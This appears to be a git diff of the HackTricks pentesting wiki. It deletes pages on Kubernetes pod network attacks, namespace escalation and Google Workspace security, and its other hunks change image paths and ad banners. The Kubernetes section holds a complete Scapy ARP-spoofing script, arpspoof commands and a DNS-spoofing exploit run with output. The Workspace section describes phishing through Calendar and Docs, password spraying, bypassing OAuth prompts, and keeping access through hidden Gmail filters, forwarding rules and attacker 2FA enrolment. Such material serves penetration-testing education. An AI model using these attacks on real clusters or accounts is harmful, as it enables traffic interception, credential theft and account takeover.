-Therefore, it's possible to perform A**RP Spoofing attacks between pods in the same node.** -{% endhint %} - -### DNS - -In kubernetes environments you will usually find 1 (or more) **DNS services running** usually in the kube-system namespace: - -```bash -kubectl -n kube-system describe services -Name: kube-dns -Namespace: kube-system -Labels: k8s-app=kube-dns - kubernetes.io/cluster-service=true - kubernetes.io/name=KubeDNS -Annotations: prometheus.io/port: 9153 - prometheus.io/scrape: true -Selector: k8s-app=kube-dns -Type: ClusterIP -IP Families: -IP: 10.96.0.10 -IPs: 10.96.0.10 -Port: dns 53/UDP -TargetPort: 53/UDP -Endpoints: 172.17.0.2:53 -Port: dns-tcp 53/TCP -TargetPort: 53/TCP -Endpoints: 172.17.0.2:53 -Port: metrics 9153/TCP -TargetPort: 9153/TCP -Endpoints: 172.17.0.2:9153 -``` - -In the previous info you can see something interesting, the **IP of the service** is **10.96.0.10** but the **IP of the pod** running the service is **172.17.0.2.** - -If you check the DNS address inside any pod you will find something like this: - -``` -cat /etc/resolv.conf -nameserver 10.96.0.10 -``` - -However, the pod **doesn't know** how to get to that **address** because the **pod range** in this case is 172.17.0.10/26. - -Therefore, the pod will send the **DNS requests to the address 10.96.0.10** which will be **translated** by the cbr0 **to** **172.17.0.2**. - -{% hint style="warning" %} -This means that a **DNS request** of a pod is **always** going to go the **bridge** to **translate** the **service IP to the endpoint IP**, even if the DNS server is in the same subnetwork as the pod. - -Knowing this, and knowing **ARP attacks are possible**, a **pod** in a node is going to be able to **intercept the traffic** between **each pod** in the **subnetwork** and the **bridge** and **modify** the **DNS responses** from the DNS server (**DNS Spoofing**). - -Moreover, if the **DNS server** is in the **same node as the attacker**, the attacker can **intercept all the DNS request** of any pod in the cluster (between the DNS server and the bridge) and modify the responses. -{% endhint %} - -## ARP Spoofing in pods in the same Node - -Our goal is to **steal at least the communication from the ubuntu-victim to the mysql**. - -### Scapy - -```bash -python3 /tmp/arp_spoof.py -Enter Target IP:172.17.0.10 #ubuntu-victim -Enter Gateway IP:172.17.0.9 #mysql -Target MAC 02:42:ac:11:00:0a -Gateway MAC: 02:42:ac:11:00:09 -Sending spoofed ARP responses - -# Get another shell -kubectl exec -it ubuntu-attack -- bash -ngrep -d eth0 - -# Login from ubuntu-victim and mysql and check the unencrypted communication -# interacting with the mysql instance -``` - -{% code title="arp_spoof.py" %} -```python -#From https://gist.github.com/rbn15/bc054f9a84489dbdfc35d333e3d63c87#file-arpspoofer-py -from scapy.all import * - -def getmac(targetip): - arppacket= Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op=1, pdst=targetip) - targetmac= srp(arppacket, timeout=2 , verbose= False)[0][0][1].hwsrc - return targetmac - -def spoofarpcache(targetip, targetmac, sourceip): - spoofed= ARP(op=2 , pdst=targetip, psrc=sourceip, hwdst= targetmac) - send(spoofed, verbose= False) - -def restorearp(targetip, targetmac, sourceip, sourcemac): - packet= ARP(op=2 , hwsrc=sourcemac , psrc= sourceip, hwdst= targetmac , pdst= targetip) - send(packet, verbose=False) - print("ARP Table restored to normal for", targetip) - -def main(): - targetip= input("Enter Target IP:") - gatewayip= input("Enter Gateway IP:") - - try: - targetmac= getmac(targetip) - print("Target MAC", targetmac) - except: - print("Target machine did not respond to ARP broadcast") - quit() - - try: - gatewaymac= getmac(gatewayip) - print("Gateway MAC:", gatewaymac) - except: - print("Gateway is unreachable") - quit() - try: - print("Sending spoofed ARP responses") - while True: - spoofarpcache(targetip, targetmac, gatewayip) - spoofarpcache(gatewayip, gatewaymac, targetip) - except KeyboardInterrupt: - print("ARP spoofing stopped") - restorearp(gatewayip, gatewaymac, targetip, targetmac) - restorearp(targetip, targetmac, gatewayip, gatewaymac) - quit() - -if __name__=="__main__": - main() - -# To enable IP forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward -``` -{% endcode %} - -### ARPSpoof - -```bash -apt install dsniff -arpspoof -t 172.17.0.9 172.17.0.10 -``` - -## DNS Spoofing - -As it was already mentioned, if you **compromise a pod in the same node of the DNS server pod**, you can **MitM** with **ARPSpoofing** the **bridge and the DNS** pod and **modify all the DNS responses**. - -You have a really nice **tool** and **tutorial** to test this in [**https://github.com/danielsagi/kube-dnsspoof/**](https://github.com/danielsagi/kube-dnsspoof/) - -In our scenario, **download** the **tool** in the attacker pod and create a \*\*file named `hosts` \*\* with the **domains** you want to **spoof** like: - -``` -cat hosts -google.com. 1.1.1.1 -``` - -Perform the attack to the ubuntu-victim machine: - -``` -python3 exploit.py --direct 172.17.0.10 -[*] starting attack on direct mode to pod 172.17.0.10 -Bridge: 172.17.0.1 02:42:bd:63:07:8d -Kube-dns: 172.17.0.2 02:42:ac:11:00:02 - -[+] Taking over DNS requests from kube-dns. press Ctrl+C to stop -``` - -```bash -#In the ubuntu machine -dig google.com -[...] -;; ANSWER SECTION: -google.com. 1 IN A 1.1.1.1 -``` - -{% hint style="info" %} -If you try to create your own DNS spoofing script, if you **just modify the the DNS response** that is **not** going to **work**, because the **response** is going to have a **src IP** the IP address of the **malicious** **pod** and **won't** be **accepted**.\ -You need to generate a **new DNS packet** with the **src IP** of the **DNS** where the victim send the DNS request (which is something like 172.16.0.2, not 10.96.0.10, thats the K8s DNS service IP and not the DNS server ip, more about this in the introduction). -{% endhint %} - -## References - -* [https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1](https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1) -* [https://blog.aquasec.com/dns-spoofing-kubernetes-clusters](https://blog.aquasec.com/dns-spoofing-kubernetes-clusters) - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
diff --git a/cloud-security/pentesting-kubernetes/namespace-escalation.md b/cloud-security/pentesting-kubernetes/namespace-escalation.md deleted file mode 100644 index 655a54faa..000000000 --- a/cloud-security/pentesting-kubernetes/namespace-escalation.md +++ /dev/null @@ -1,66 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -In Kubernetes it's pretty common that somehow **you manage to get inside a namespace** (by stealing some user credentials or by compromising a pod). However, usually you will be interested in **escalating to a different namespace as more interesting things can be found there**. - -Here are some techniques you can try to escape to a different namespace: - -## Abuse K8s privileges - -Obviously if the account you have stolen have sensitive privileges over the namespace you can to escalate to, you can abuse actions like **creating pods** with service accounts in the NS, **executing** a shell in an already existent pod inside of the ns, or read the **secret** SA tokens. - -For more info about which privileges you can abuse read: - -{% content-ref url="abusing-roles-clusterroles-in-kubernetes/" %} -[abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/) -{% endcontent-ref %} - -## Escape to the node - -If you can escape to the node either because you have compromised a pod and you can escape or because you ca create a privileged pod and escape you could do several things to steal other SAs tokens: - -* Check for **SAs tokens mounted in other docker containers** running in the node -* Check for new **kubeconfig files in the node with extra permissions** given to the node -* If enabled (or enable it yourself) try to **create mirrored pods of other namespaces** as you might get access to those namespaces default token accounts (I haven't tested this yet) - -All these techniques are explained in: - -{% content-ref url="../../pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md" %} -[attacking-kubernetes-from-inside-a-pod.md](../../pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md) -{% endcontent-ref %} - - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/workspace-security.md b/cloud-security/workspace-security.md deleted file mode 100644 index 6828e16b7..000000000 --- a/cloud-security/workspace-security.md +++ /dev/null @@ -1,252 +0,0 @@ -# Workspace Security - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- -## Workspace Phishing - -### Generic Phishing Methodology - -{% content-ref url="../generic-methodologies-and-resources/phishing-methodology/" %} -[phishing-methodology](../generic-methodologies-and-resources/phishing-methodology/) -{% endcontent-ref %} - -### Google Groups Phishing - -Apparently by default in workspace members [**can create groups**](https://groups.google.com/all-groups) **and invite people to them**. You can then modify the email that will be sent to the user **adding some links.** The **email will come from a google address**, so it will looks **legit** and people might click on the link. - -### Hangout Phishing - -You might be able either to directly talk with a person just having his email address or sending an invitation to talk. Either way, modify an email account maybe naming it "Google Security" and adding some Google logos, and the people will think they are talking to google: [https://www.youtube.com/watch?v=KTVHLolz6cE\&t=904s](https://www.youtube.com/watch?v=KTVHLolz6cE\&t=904s) - -Just the **same technique** can be used with **Google Chat**. - -### Google Doc Phishing - -You can create an **apparently legitimate document** and the in a comment **mention some email (like +user@gmail.com)**. Google will **send an email to that email address** notifying that he was mentioned in the document. You can **put a link in that document** to try to make the persona access it. - -### Google Calendar Phishing - -You can **create a calendar event** and add as many email address of the company you are attacking as you have. Schedule this calendar event in **5 or 15 min** from the current time. Make the event looks legit and **put a comment indicating that they need to read something** (with the **phishing link**).\ -To make it looks less suspicious: - -* Set that the **receivers cannot see the other invited people** -* Do **NOT send emails notifying about the event**. Then, the people will only see their warning about a meeting in 5mins and that they need to read that link. -* Apparently using the API you can set to **True** that **people** has **accepted** the event and even create **comments on their behalf**. - -### OAuth Phishing - -Any of the previous techniques might be used to make the user access a **Google OAuth application** that will **request** the user some **access**. If the user **trust** the **source** he might **trust** the **application** (even if it's asking for high privileged permissions). - -Note that Google presents an ugly prompt asking warning that the application is untrusted in several cases and from Workspace admins can even prevent people to accept OAuth applications. More on this in the OAuth section. - -## Password Spraying - -In order to test passwords with all the emails you found (or you have generated based in a email name pattern you might have discover) you can use a tool like [**https://github.com/ustayready/CredKing**](https://github.com/ustayready/CredKing) who will use AWS lambdas to change IP address. - -## Oauth Apps - -**Google** allows to create applications that can **interact on behalf users** with several **Google services**: Gmail, Drive, GCP... - -When creating an application to **act on behalf other users**, the developer needs to create an **OAuth app inside GCP** and indicate the scopes (permissions) the app needs to access the users data.\ -When a **user** wants to **use** that **application**, he will be **prompted** to **accept** that the application will access to his data specified in the scopes. - -This is a very juicy way to **phish** non-technical users into using **applications that access sensitive information** because they might not understand the consequences. Therefore, in organizations accounts, there are ways to prevent this from happening. - -### Unverified App prompt - -As it was mentioned, google will always present a **prompt to the user to accept** the permissions he is giving the application on his behalf. However, if the application is considered **dangerous**, google will show **first** a **prompt** indicating that it's **dangerous** and **making more difficult** to the user to grant the permissions to the app. - -This prompt appears in apps that: - -* Uses any scope that can access to private data (Gmail, Drive, GCP, BigQuery...) -* Apps with less than 100 users (apps > 100 a review process is needed also to not show the unverified prompt) - -### Interesting Scopes - -You can [**find here**](https://developers.google.com/identity/protocols/oauth2/scopes) a list of all the Google OAuth scopes. - -* **cloud-platform**: View and manage your data across **Google Cloud Platform** services. You can impersonate the user in GCP. -* **directory.readonly**: See and download your organization's GSuite directory. Get names, phones, calendar URLs of all the users. - -## App Scripts - -Developers can create App Scripts and set them as a standalone project or bound them to Google Docs/Sheets/Slides/Forms. App Scripts is code that will be triggered when a user with editor permission access the doc (and after accepting the OAuth prompt) - -However, even if the app isn't verified there are a couple of ways to not show that prompt: - -* If the publisher of the app is in the same Workspace as the user accessing it -* If the script is in a drive of the user - -### Copy Document Unverified Prompt Bypass - -When you create a link to share a document a link similar to this one is created: `https://docs.google.com/spreadsheets/d/1i5[...]aIUD/edit`\ -If you **change** the ending **"/edit"** for **"/copy"**, instead of accessing it google will ask you if you want to **generate a copy of the document.** - -{% hint style="warning" %} -If someone creates a **copy** of that **document** that **contained the App Script**, he will also be **copying the App Script**, therefore when he **opens** the copied **spreadsheet**, the **regular OAuth prompt** will appear **bypassing the unverified prompt**, because **the user is now the author of the App Script of the copied file**. -{% endhint %} - -This method will be able to bypass also the Workspace admin restriction: - -![](<../.gitbook/assets/image (662) (1) (1) (1) (1).png>) - -But can be prevented with: - -![](<../.gitbook/assets/image (632).png>) - -### Shared Document Unverified Prompt Bypass - -Moreover, if someone **shared** with you a document with **editor access**, you can generate **App Scripts inside the document** and the **OWNER (creator) of the document will be the owner of the App Script**. - -{% hint style="warning" %} -This means, that the **creator of the document will appear as creator of any App Script** anyone with editor access creates inside of it. - -This also means that the **App Script will be trusted by the Workspace environment** of the creator of the document. -{% endhint %} - -{% hint style="danger" %} -This also means that if an **App Script already existed** and people has **granted access**, anyone with **Editor** permission to the doc can **modify it and abuse that access.**\ -To abuse this you also need people to trigger the App Script. And one neat trick if to **publish the script as a web app**. When the **people** that already granted **access** to the App Script access the web page, they will **trigger the App Script** (this also works using `` tags. -{% endhint %} - -## Post-Exploitation - -### Google Groups Privesc - -By default in workspace a **group** can be **freely accessed** by any member of the organization.\ -Workspace also allow to **grant permission to groups** (even GCP permissions), so if groups can be joined and they have extra permissions, an attacker may **abuse that path to escalate privileges**. - -You potentially need access to the console to join groups that allow to be joined by anyone in the org. Check groups information in [**https://groups.google.com/all-groups**](https://groups.google.com/all-groups). - -### Privesc to GCP Summary - -* Abusing the **google groups privesc** you might be able to escalate to a group with some kind of privileged access to GCP -* Abusing **OAuth applications** you might be able to impersonate users and access to GCP on their behalf - -### Access Groups Mail info - -If you managed to **compromise a google user session**, from [**https://groups.google.com/all-groups**](https://groups.google.com/all-groups) you can see the history of mails sent to the mail groups the user is member of, and you might find **credentials** or other **sensitive data**. - -### Takeout - Download Everything Google Knows about an account - -If you have a **session inside victims google account** you can download everything Google saves about that account from [**https://takeout.google.com**](https://takeout.google.com/u/1/?pageId=none) - -### Vault - Download all the Workspace data of users - -If an organization has **Google Vault enabled**, you might be able to access [**https://vault.google.com**](https://vault.google.com/u/1/) and **download** all the **information**. - -### Contacts download - -From [**https://contacts.google.com**](https://contacts.google.com/u/1/?hl=es\&tab=mC) you can download all the **contacts** of the user. - -### Cloudsearch - -In [**https://cloudsearch.google.com/**](https://cloudsearch.google.com) you can just search **through all the Workspace content** (email, drive, sites...) a user has access to. Ideal to **find quickly sensitive information**. - -### Currents - -In [**https://currents.google.com/**](https://currents.google.com) you can access a Google **Chat**, so you might find sensitive information in there. - -### Google Drive Mining - -When **sharing** a document yo can **specify** the **people** that can access it one by one, **share** it with your **entire company** (**or** with some specific **groups**) by **generating a link**. - -When sharing a document, in the advance setting you can also **allow people to search** for this file (by **default** this is **disabled**). However, it's important to note that once users views a document, it's searchable by them. - -For sake of simplicity, most of the people will generate and share a link instead of adding the people that can access the document one by one. - -Some proposed ways to find all the documents: - -* Search in internal chat, forums... -* **Spider** known **documents** searching for **references** to other documents. You can do this within an App Script with[ **PaperChaser**](https://github.com/mandatoryprogrammer/PaperChaser) - -### **Keep Notes** - -In [**https://keep.google.com/**](https://keep.google.com) you can access the notes of the user, **sensitive** **information** might be saved in here. - -### Persistence inside a Google account - -If you managed to **compromise a google user session** and the user had **2FA**, you can **generate** an [**app password**](https://support.google.com/accounts/answer/185833?hl=en) and **regenerate the 2FA backup codes** to know that even if the user change the password you **will be able to access his account**. Another option **instead** of **regenerating** the codes is to **enrol your own authenticator** app in the 2FA. - -### Persistence via OAuth Apps - -If you have **compromised the account of a user,** you can just **accept** to grant all the possible permissions to an **OAuth App**. The only problem is that Workspace can configure to **disallow external and/or internal OAuth apps** without being reviewed.\ -It is pretty common to not trust by default external OAuth apps but trust internal ones, so if you have **enough permissions to generate a new OAuth application** inside the organization and external apps are disallowed, generate it and **use that new internal OAuth app to maintain persistence**. - -### Persistence via delegation - -You can just **delegate the account** to a different account controlled by the attacker. - -### Persistence via Android App - -If you have a **session inside victims google account** you can browse to the **Play Store** and **install** a **malware** you have already uploaded it directly **in the phone** to maintain persistence and access the victims phone. - -### **Persistence via Gmail** - -* You can create **filters to hide** security notifications from Google - * from: (no-reply@accounts.google.com) "Security Alert" - * Hide password reset emails -* Create **forwarding address to forward sensitive information** (or everything) - You need manual access. - * Create a forwarding address to send emails that contains the word "password" for example -* Add **recovery email/phone under attackers control** - -### **Persistence via** App Scripts - -You can create **time-based triggers** in App Scripts, so if the App Script is accepted by the user, it will be **triggered** even **without the user accessing it**. - -The docs mention that to use `ScriptApp.newTrigger("funcion")` you need the **scope** `script.scriptapp`, but **apparently thats not necessary** as long as you have declare some other scope. - -### **Administrate Workspace** - -In [**https://admin.google.com**/](https://admin.google.com), if you have enough permissions you might be able to modify settings in the Workspace of the whole organization. - -You can also search emails through all the users invoices in [**https://admin.google.com/ac/emaillogsearch**](https://admin.google.com/ac/emaillogsearch) - -## Account Compromised Recovery - -* Log out of all sessions -* Change user password -* Generate new 2FA backup codes -* Remove App passwords -* Remove OAuth apps -* Remove 2FA devices -* Remove email forwarders -* Remove emails filters -* Remove recovery email/phones -* Remove bad Android Apps -* Remove bad account delegations - -## References - -* [https://www.youtube-nocookie.com/embed/6AsVUS79gLw](https://www.youtube-nocookie.com/embed/6AsVUS79gLw) - Matthew Bryant - Hacking G Suite: The Power of Dark Apps Script Magic -* [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch and Beau Bullock - OK Google, How do I Red Team GSuite? - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md index 0130d3efe..c7bee7ce7 100644 --- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md +++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md @@ -61,7 +61,7 @@ From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Sig In order to mount an MBR in Linux you first need to get the start offset (you can use `fdisk` and the `p` command) -![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).png>) +![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (3).png>) And then use the following code diff --git a/forensics/basic-forensic-methodology/windows-forensics/README.md b/forensics/basic-forensic-methodology/windows-forensics/README.md index aa1adc29e..404713484 100644 --- a/forensics/basic-forensic-methodology/windows-forensics/README.md +++ b/forensics/basic-forensic-methodology/windows-forensics/README.md @@ -156,7 +156,7 @@ The files in the folder WPDNSE are a copy of the original ones, then won't survi Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced (search for `Section start`). -![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (12).png>) +![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (2).png>) ### USB Detective diff --git a/generic-methodologies-and-resources/exfiltration.md b/generic-methodologies-and-resources/exfiltration.md index bfa5022dc..71bbbe06d 100644 --- a/generic-methodologies-and-resources/exfiltration.md +++ b/generic-methodologies-and-resources/exfiltration.md @@ -14,7 +14,7 @@ -\ +\ **Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} @@ -159,7 +159,7 @@ echo bye >> ftp.txt ftp -n -v -s:ftp.txt ``` -\ +\ **Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} @@ -371,7 +371,7 @@ Now we just copy-paste the text into our windows-shell. And it will automaticall * [https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil) -\ +\ **Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} diff --git a/generic-methodologies-and-resources/phishing-methodology/README.md b/generic-methodologies-and-resources/phishing-methodology/README.md index fa2b57c08..38671ec56 100644 --- a/generic-methodologies-and-resources/phishing-methodology/README.md +++ b/generic-methodologies-and-resources/phishing-methodology/README.md @@ -337,7 +337,7 @@ The page www.mail-tester.com can indicate you if you your domain is being blocke * Decide from which account are you going to send the phishing emails. Suggestions: _noreply, support, servicedesk, salesforce..._ * You can leave blank the username and password, but make sure to check the Ignore Certificate Errors -![](<../../.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).png>) +![](<../../.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (8).png>) {% hint style="info" %} It's recommended to use the "**Send Test Email**" functionality to test that everything is working.\ diff --git a/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/README.md b/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/README.md index 593c607ab..a2f86357d 100644 --- a/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/README.md +++ b/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/README.md @@ -4,25 +4,19 @@ Support HackTricks and get benefits! -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** -{% hint style="danger" %} **Security Skills as a Service** platform bridges the current skill set gap by combining **global offensive security talent with smart automation**, providing real-time data you need to make informed decisions. {% embed url="https://www.syncubes.com/" %} -{% endhint %} ## Automatic Enumeration & Escape @@ -495,8 +489,8 @@ Like in the following examples: You will be able also to access **network services binded to localhost** inside the host or even access the **metadata permissions of the node** (which might be different those a container can access): -{% content-ref url="../../../../cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md" %} -[kubernetes-access-to-other-clouds.md](../../../../cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md) +{% content-ref url="broken-reference" %} +[Broken link](broken-reference) {% endcontent-ref %} ### hostIPC @@ -514,17 +508,11 @@ If you only have `hostIPC=true`, you most likely can't do much. If any process o The second technique explained in the post [https://labs.f-secure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/](https://labs.f-secure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/) indicates how you can abuse bind mounts with user namespaces, to affect files inside the host (in that specific case, delete files). - - - - -{% hint style="danger" %} **Security Skills as a Service** platform bridges the current skill set gap by combining **global offensive security talent with smart automation**, providing real-time data you need to make informed decisions. {% embed url="https://www.syncubes.com/" %} -{% endhint %} ## CVEs @@ -569,26 +557,20 @@ If you are in **userspace** (**no kernel exploit** involved) the way to find new * [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/exposed-docker-socket](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/exposed-docker-socket) * [https://bishopfox.com/blog/kubernetes-pod-privilege-escalation#Pod4](https://bishopfox.com/blog/kubernetes-pod-privilege-escalation#Pod4) -{% hint style="danger" %} **Security Skills as a Service** platform bridges the current skill set gap by combining **global offensive security talent with smart automation**, providing real-time data you need to make informed decisions. {% embed url="https://www.syncubes.com/" %} -{% endhint %}
